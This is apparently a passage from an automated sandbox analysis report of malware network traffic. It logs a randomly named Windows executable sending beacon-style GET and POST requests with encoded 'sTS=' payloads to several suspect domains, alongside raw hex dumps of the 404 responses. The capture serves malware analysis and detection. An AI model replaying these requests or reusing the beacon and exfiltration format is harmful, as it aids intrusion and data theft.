                                                                                                                                      Data Ascii: sTS=O4vtRILiG/aVsAm22/zeh3tRX4DTkxL/nt9Lwk4fnjSPXdjXZZbwMZI5ZmIU7w9dLi3qXI9PyJlZ6WdLKPfhnxrUUaz5VuK0wOBj0AfDCJAA9kd9RCcC666RDH6JaoxxEDej5sCvqNXP+x3GH1b6ifAXdHwJdXPchaFJmMNV7nMoP05IhXa/hhsE7+ZWeLJZCMW5eSToVSl7xVCQchUxjyVoQqHTmjHdelF/19N3OrZYi2huqrVrh7cg/C/wJFic/m4d7Q4xMXff2kfvRqTQa3BVw4ZBWfA9zqIA5YtI0U/WLdI9NYJQndVZ5YQBblFDMj9laFFDzW/BqBg8kdibYXMnqEKJa7KiGepFSxM6WpQTCqgxAMSmjedBB2Q9klcwRVPuw5eqIXiO64lq1X0YSELleGBpkkflD3ooQR5wFMEcY7B0OXwGupK7fxC8Dcewl1LYwLx+8r0Jg2X8wVfegTOvhDg7Y2eYeYS35TYC7GNQru6wVNTbVPiIZHqfNVAf7BpTlyl2wdSyHhZVvwlUC2wvD2Z1qx3iWenXKNngl4+z5LpFqMwY1ysgSyEAV99d81qHiL2hmUIRdaC+CXcJNkmq6U2S4FHpZXeElDt4LMhBW7/vlTItYgUZ30LDxSnxWiU9NIItSySk1sCok5y6tmZuQopVYpif8SMabhNP3S00O1G2zH5biD5cCskw1Mal3cqDY3wB2DY3rT5nW+H7BfdBf6piAU2hahmXpHnEWhVol35APQtSiN+QoLvxuzg2zQoptS4WrmgWe4iR38jogk+NufhslpqQH2UAsFTAGiGD2UnZf3LrNyoLBxdDDcbikhtG89IE4CBck2xxD1BX7k6s+wHJ9gLbmAycldZnnzs8643Fq50KIUShOZIhV0jor2/kBYARsWvKKSVHVPaIJL04m4MKa6WtwPmRtW2TpOleFYHGmToxNSxtOezEjkZ/D3gsa6vUF1rBL/QzxUpf9WFDb0VfP7BxGNhg8IZ0EUr7XakM [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:39:50.019889116 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABNAt83oNbX1%2BxC9PZcogsWDBhlWCz32Ai61%2Fa2PGJjln2NRnnqP6zy7H2e%2BoMmV6RjaL7119DzTJo16HFtYrGck5qpFvhsS%2B9XdImzxz2xbNFUPC1yfL8qRb5y5DM5RK%2BVBGktkBs8k"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399384c6d8c41-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10822&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab
                                                                                                                                      Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2
                                                                                                                                      Jan 11, 2025 09:39:50.019906044 CET430INData Raw: 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a
                                                                                                                                      Data Ascii: hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      52192.168.2.450060104.21.88.139804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:51.953730106 CET445OUTGET /rm8a/?sTS=D6HNS+3OA9WxuB6ixfDf8ScOMqf60XWg1eRGn1U3pQm4dbrOXbziEv17YWBDjG9YL3PgZ6NF0eFX/SB1L/rjn2byVNbXQbqI29dbukDAFIdClQ55cQRWn7Y=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:39:52.587037086 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuMRHg8zPOKYYiFqQ7hQbJ5gCnjfyjrz9kWB21BvEQSp5nVxuDMCsg3t0yyVamWJIJSfgx35q2kH5ofNSNZguVMQtwoBiwl45HoeLMMovV096qWKsh7z7Ss4ZQVWiee30BgfgLY991jC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399485b0cde93-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=445&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                                                                                                                      Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica,
                                                                                                                                      Jan 11, 2025 09:39:52.587058067 CET916INData Raw: 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65
                                                                                                                                      Data Ascii: sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-si


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      53192.168.2.45006115.197.142.17380
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:01.112095118 CET444OUTGET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.dojodigitize.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:40:01.576699972 CET133INHTTP/1.1 404 Not Found
                                                                                                                                      Server: awselb/2.0
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:01 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      WAFRule: 5


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      54192.168.2.450062104.21.80.180
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:06.623487949 CET702OUTPOST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 55 52 61 38 46 33 5a 66 5a 4a 4b 4c 54 56 49 30 37 72 41 69 57 4e 55 33 51 53 43 61 6f 76 4c 34 6a 53 47 4e 78 34 61 52 66 38 48 2b 64 44 75 6e 61 54 2f 64 67 62 56 34 61 70 34 75 67 2f 31 53 6c 2f 4e 2b 51 74 79 58 53 74 64 7a 32 6e 38 74 7a 32 31 43 5a 2b 66 77 6b 50 51 2b 74 48 51 63 47 75 44 42 41 6b 39 56 4a 39 46 4f 4a 66 39 62 6a 4c 6b 4a 41 4f 41 7a 65 48 73 35 46 46 68 39 57 42 76 42 78 55 35 36 73 56 77 76 4d 4a 4f 65 30 51 4b 77 78 46 6f 77 43 50 58 75 50 78 61 2f 4a 36 52 42 2f 59 61 71 32 35 59 53 4c 54 42 65 48 30 76 5a 6a 77 3d 3d
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxFowCPXuPxa/J6RB/Yaq25YSLTBeH0vZjw==
                                                                                                                                      Jan 11, 2025 09:40:07.209880114 CET836INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:07 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ti8Udf75Eo4n743kGB%2F9QPbb758G2bmcA1Bg6XRDpwzJlTE7VD4PVTyLdQ9dDyyciKIMAgK62j%2Fuf%2BDz1aDUv6IW%2Bexwuu5sRMbBygvlnA7x%2BQTGPrGGEXh%2BoHl8Qi71aRq6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399a3cbaf43ee-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                                                      Data Ascii: f
                                                                                                                                      Jan 11, 2025 09:40:07.210459948 CET225INData Raw: 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51
                                                                                                                                      Data Ascii: d6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      55192.168.2.450063104.21.80.180
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:09.163280964 CET722OUTPOST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 53 78 71 38 45 55 78 66 52 4a 4b 4d 4b 6c 49 30 78 4c 41 6d 57 4e 59 33 51 54 47 4b 6f 61 54 34 6b 79 32 4e 2b 63 4f 52 65 38 48 2b 58 6a 75 69 51 7a 2f 47 67 62 5a 77 61 74 34 75 67 2f 68 53 6c 39 56 2b 51 61 75 59 54 39 64 78 77 6e 38 76 33 32 31 43 5a 2b 66 77 6b 50 45 41 74 48 49 63 48 65 7a 42 41 47 56 55 50 4e 46 4e 4f 66 39 62 6e 4c 6b 46 41 4f 41 64 65 47 78 6b 46 47 56 39 57 41 66 42 79 46 35 35 69 56 77 74 50 35 50 37 7a 51 50 47 38 6d 45 39 41 2f 37 69 46 52 4c 63 46 63 63 62 75 70 37 39 6b 35 38 68 57 55 49 71 4b 33 53 51 34 77 2f 6b 52 4b 58 67 47 53 41 59 6a 69 4e 56 6a 45 4c 2f 33 57 55 3d
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoaT4ky2N+cORe8H+XjuiQz/GgbZwat4ug/hSl9V+QauYT9dxwn8v321CZ+fwkPEAtHIcHezBAGVUPNFNOf9bnLkFAOAdeGxkFGV9WAfByF55iVwtP5P7zQPG8mE9A/7iFRLcFccbup79k58hWUIqK3SQ4w/kRKXgGSAYjiNVjEL/3WU=
                                                                                                                                      Jan 11, 2025 09:40:09.781738997 CET1043INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:09 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wKd7SpC5Ihip1i8tpWZqhMXbcZ2abVLvkidWSpdL1Om5RwtkW%2BmTg%2Fb4p62K1hKRW4gnvJwmzIwjiDE6FGv1cwEcxsLxfJoDb5zCQECZzWaSyddKkL2x3LwCrHrfm1QzQYd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399b3b8508c0f-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 64 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a
                                                                                                                                      Data Ascii: d5LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8b*Y6
                                                                                                                                      Jan 11, 2025 09:40:09.782279015 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      56192.168.2.450064104.21.80.180
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:11.710021019 CET10804OUTPOST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 53 78 71 38 45 55 78 66 52 4a 4b 4d 4b 6c 49 30 78 4c 41 6d 57 4e 59 33 51 54 47 4b 6f 61 62 34 6a 41 2b 4e 78 64 4f 52 59 4d 48 2b 52 54 75 6a 51 7a 2b 65 67 66 31 30 61 74 30 2b 67 38 5a 53 71 38 31 2b 59 4c 75 59 59 39 64 78 79 6e 38 75 7a 32 30 41 5a 2b 76 30 6b 50 55 41 74 48 49 63 48 63 37 42 4a 30 39 55 4e 4e 46 4f 4a 66 38 61 6a 4c 6b 70 41 4f 6f 72 65 47 31 30 5a 67 6c 39 50 67 50 42 30 33 68 35 75 56 77 72 4b 35 50 5a 7a 52 7a 56 38 6e 70 4d 41 2f 2b 4e 46 54 58 63 56 64 42 41 7a 61 44 37 32 70 38 49 4b 55 77 65 4b 55 6e 56 39 48 6e 69 66 61 6a 4a 53 78 77 31 6f 52 6f 6e 38 6c 58 34 6f 69 77 74 6e 62 77 48 51 6f 31 62 41 69 54 76 48 4f 30 4f 58 31 7a 41 58 4d 38 32 4c 45 30 54 2b 33 6b 68 54 49 30 37 36 76 45 71 6f 59 79 6a 35 33 48 47 44 4b 32 63 35 75 6d 44 2b 47 53 36 6e 2f 68 78 57 75 6b 39 65 49 59 54 44 45 55 77 38 37 6d 4d 75 45 4e 34 46 67 46 7a 73 6a 74 74 58 59 79 32 63 72 68 33 63 68 30 68 39 31 65 42 37 7a 49 62 65 4c 65 49 51 4c [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoab4jA+NxdORYMH+RTujQz+egf10at0+g8ZSq81+YLuYY9dxyn8uz20AZ+v0kPUAtHIcHc7BJ09UNNFOJf8ajLkpAOoreG10Zgl9PgPB03h5uVwrK5PZzRzV8npMA/+NFTXcVdBAzaD72p8IKUweKUnV9HnifajJSxw1oRon8lX4oiwtnbwHQo1bAiTvHO0OX1zAXM82LE0T+3khTI076vEqoYyj53HGDK2c5umD+GS6n/hxWuk9eIYTDEUw87mMuEN4FgFzsjttXYy2crh3ch0h91eB7zIbeLeIQLnCV0/8Y+UTaKPe5w2+zuMUdRWw10SdorsMOwASGWjIR0Dk7n7vm8V7dhgPYXWaWRd5Qq/+AjYCrbJKygIoggU39kkE1IivCrc6eDSjgCl8LHjzPV+dhx1/OS0RNbyBwhzW1ovm5Z5t2Y9Ec3srUiPtvu4EnAc/zrcJFZuRmT0Ecwqpl6hXf9Fb84x6IfmZTL4gTioDJWwmp7pAvGgm8SjM5hdWFeSvGB0HcVyMvg5fdCBQV/QhSaP0x+v4rHcl+8kxqZKcX4egoGUA6XnZkVy0mpgd31DI2JyVIZ/+cFg8SzGsmOrMYvdykUQ/BliBGi8NYXMrLCF6zk+Uwg5PmRWI8Cj2Lsneq4C+2LVeQIKo+qDoDNZttfvjnuPOUZKFz4lg6galcuokGdtO0W6Y0ug8/hWDk53vxOnU+mek7IhyH/K6ye/IgwRay5KiB3ic1Vvd9C6heRkKf1HqC2IRiQOS7Row1UJVLSGQVgLiXbfvawjhkdFX7+Q8J8EoJ2NgYIWYB/PV6E3RwtwgCiIG1YvTKbdnDFCUSmIOgHQjP5U8rgg5U/H7k5Id/gMPJezCOPMxt1yTVWFZouarDhRWI2NimOZ+MFw/H7ttQuH6BLjhU5D1x3slJuLE9EKuC5xrWDVISsoXHgnPLsFTsnD2QcR+4gtXINGWB0QQ [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:40:12.324444056 CET1055INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:12 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbpIwYfvCWaqPyEx4jFH54W8ykyO%2FKSHMVTsWG1pMWooMCEKVIPX6bPIYw%2FWwteRMGN%2FKg6gQhaZZ38Uu9p68cA5uanxe%2BDWi4NsMexLRrlA9tf3cCEelpu8oZiFuUYg7wys"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399c3aa008c0f-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 64 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: d5LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8b*Y60


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      57192.168.2.450065104.21.80.180
                                                                                                                                      TimestampBytes transferredDirectionData
